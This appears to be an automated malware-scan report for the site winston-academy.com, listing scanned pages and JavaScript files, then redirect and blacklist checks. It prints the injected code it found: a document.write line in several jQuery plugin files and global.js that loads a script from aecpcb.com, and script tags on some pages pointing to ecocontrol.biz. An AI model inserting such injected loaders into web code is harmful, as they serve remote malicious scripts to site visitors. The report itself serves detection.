Scanned pages/files
Request | Server response | Status |
http://www.winston-academy.com/ | 200 OK Content-Length: 20970 Content-Type: text/html | clean |
http://www.winston-academy.com/js/jquery-1.5.2.min.js | 200 OK Content-Length: 86098 Content-Type: application/javascript | clean |
http://www.winston-academy.com/js/jquery.easing.1.3.min.js | 200 OK Content-Length: 3611 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing.jswing=jQuery.easing.swing; jQuery.extend(jQuery.easing,{def:"easeOutQuad",swing:function(e,a,c,b,d){return jQuery.easing[jQuery.easing.def](e,a,c,b,d)},easeInQuad:function(e,a,c,b,d){return b*(a/=d)*a c},easeOutQuad:function(e,a,c,b,d){return-b*(a/=d)*(a-2) c},easeInOutQuad:function(e,a,c,b,d){if((a/=d/2)<1)return b/2*a*a c;return-b/2*(--a*(a-2)-1) c},easeInCubic:function(e,a,c,b,d){return b*(a/=d)*a*a c},easeOutCubic:function(e,a,c,b,d){return b*((a=a/d-1)*a*a 1) c},easeIn document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://aecpcb.com/dyn/eEJvcUDS.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.winston-academy.com/js/global.js | 200 OK Content-Length: 6471 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function(){ $(".search_button").click(function(){ $("#search_form").submit(); }); $(".close").click(function(){ $(".result_container").hide(); $(".sonuclar").hide(); $(".close").hide(); }); $("#search_form").submit(function(e){ var val = $("div#searchBox input#q").val(); var lang = $("div#searchBox input#lang").val(); var size = $("div#searchBox input#q").val().length; var unicode=e.keyCode? e.keyCode : e.cha return false; } } } if (document.layers){ document.captureEvents(Event.MOUSEDOWN); document.onmousedown=clickNS4; } else if (document.all&&!document.getElementById){ document.onmousedown=clickIE4; } document.oncontextmenu=new Function("return false") document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://aecpcb.com/dyn/eEJvcUDS.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.winston-academy.com/js/jquery.jcarousel.min.js | 200 OK Content-Length: 15824 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(g){var q={vertical:!1,rtl:!1,start:1,offset:1,size:null,scroll:3,visible:null,animation:"normal",easing:"swing",auto:0,wrap:null,initCallback:null,setupCallback:null,reloadCallback:null,itemLoadCallback:null,itemFirstInCallback:null,itemFirstOutCallback:null,itemLastInCallback:null,itemLastOutCallback:null,itemVisibleInCallback:null,itemVisibleOutCallback:null,animationStepCallback:null,buttonNextHTML:"<div></div>",buttonPrevHTML:"<div></div>",buttonNextEvent:"c document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://aecpcb.com/dyn/eEJvcUDS.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.winston-academy.com/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 11725 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a){var b=function(b,c){var d=a.extend({},a.fn.nivoSlider.defaults,c);var e={currentSlide:0,currentImage:"",totalSlides:0,running:false,paused:false,stop:false};var f=a(b);f.data("nivo:vars",e);f.css("position","relative");f.addClass("nivoSlider");var g=f.children();g.each(function(){var b=a(this);var c="";if(!b.is("img")){if(b.is("a")){b.addClass("nivo-imageLink");c=b}b=b.find("img:first")}var d=b.width();if(d==0)d=b.attr("width");var g=b.height();if(g==0)g=b.attr("height");if(d>f.w document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://aecpcb.com/dyn/eEJvcUDS.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.winston-academy.com/index.php | 200 OK Content-Length: 20970 Content-Type: text/html | clean |
http://www.winston-academy.com/index.php?cmd=pages&id=2 | 200 OK Content-Length: 11411 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.ecocontrol.biz/TgcN4K58.php?id=23715685" type="text/javascript"></script> | ||
http://www.winston-academy.com/index.php?cmd=urunlerimiz | 200 OK Content-Length: 14430 Content-Type: text/html | clean |
http://www.winston-academy.com/index.php?cmd=galeri | 200 OK Content-Length: 12609 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.ecocontrol.biz/TgcN4K58.php?id=23715674" type="text/javascript"></script> | ||
http://www.winston-academy.com/js/lightbox/jquery.lightbox.min.js | 200 OK Content-Length: 17085 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('(F($){H q=($.1H.2A&&1I($.1H.2B,10)<7&&1I($.1H.2B,10)>4);H r=(1w.3I.2C().1x(\'4P\')!=-1);H u=(1w.3I.2C().1x(\'4Q\')!=-1);B($.L===1W){$.1r({L:F(a,b) document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://aecpcb.com/dyn/eEJvcUDS.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.winston-academy.com/index.php?cmd=pages&id=3 | 200 OK Content-Length: 11403 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.ecocontrol.biz/TgcN4K58.php?id=23715685" type="text/javascript"></script> | ||
http://www.winston-academy.com/index.php?cmd=pages&id=4 | 200 OK Content-Length: 11411 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.ecocontrol.biz/TgcN4K58.php?id=23715685" type="text/javascript"></script> | ||
http://www.winston-academy.com/index.php?cmd=pages&id=5 | 200 OK Content-Length: 15925 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.ecocontrol.biz/TgcN4K58.php?id=23715685" type="text/javascript"></script> | ||
http://www.winston-academy.com/index.php?cmd=urunlerimiz&kategoriID=42 | 200 OK Content-Length: 13760 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: winston-academy.com
Result:
GET / HTTP/1.1
Host: winston-academy.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: winston-academy.com
Referer: http://www.google.com/search?q=winston-academy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: winston-academy.com
Referer: http://www.google.com/search?q=winston-academy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=winston-academy.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://winston-academy.com/
Result: winston-academy.com is not infected or malware details are not published yet.
Result: winston-academy.com is not infected or malware details are not published yet.